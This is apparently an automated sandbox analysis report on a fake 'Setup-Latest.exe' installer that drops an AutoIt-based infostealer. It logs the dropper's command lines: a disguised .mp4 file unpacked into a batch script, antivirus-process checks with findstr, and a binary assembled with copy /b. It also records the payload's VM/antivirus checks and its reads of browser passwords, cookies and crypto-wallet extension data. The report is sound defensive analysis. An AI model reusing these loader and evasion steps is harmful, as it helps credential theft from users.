Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Setup-Latest.exeStatic file information: File size 1444885 > 1048576
      Source: Setup-Latest.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\562639\Wages.com
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\562639\Wages.com
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com TID: 7356 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com TID: 7340 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\562639
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\562639\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Wide.mp4 Wide.mp4.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 562639
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Always.mp4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Yang" Labor
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 562639\Wages.com + Uniform + Textbooks + Exhibits + Accountability + Fails + Pavilion + Suggestions + Decorating + Volunteers 562639\Wages.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Strikes.mp4 + ..\Darkness.mp4 + ..\Oaks.mp4 + ..\Fares.mp4 + ..\Funding.mp4 + ..\Complimentary.mp4 + ..\Relate.mp4 G
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\562639\Wages.com Wages.com G
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: Wages.com, 0000000D.00000000.1763255418.0000000000973000.00000002.00000001.01000000.00000007.sdmp, Decorating.9.dr, Wages.com.1.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
